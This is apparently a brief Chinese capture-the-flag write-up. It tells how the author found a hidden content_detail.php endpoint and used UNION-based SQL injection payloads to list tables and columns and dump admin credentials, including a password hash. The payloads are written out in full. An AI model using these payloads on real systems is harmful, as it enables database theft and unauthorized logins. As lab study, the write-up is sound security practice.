- 进入题目给了两个页面
- 一开始以为在注入点在登录页面 尝试了万能密码 和 各种闭合 没发现注入的方式
- 接着尝试了热点列表页面的注入 但是url上好像不存在注入
- F12在net中找到了隐藏的url
- 访问
content_detail.php?id=1
页面构造payload
?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
# admin、contents
?id=0 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin' and table_schema=database()#
# id、username、password
?id=0 union select group_concat(username),group_concat(password) from admin#
# admin、4060176f25a3fc1f44932f0a24a70759
- 登录获取flag
- 这道题的考点在于注入点的寻找…注入流程中并没有设置考点。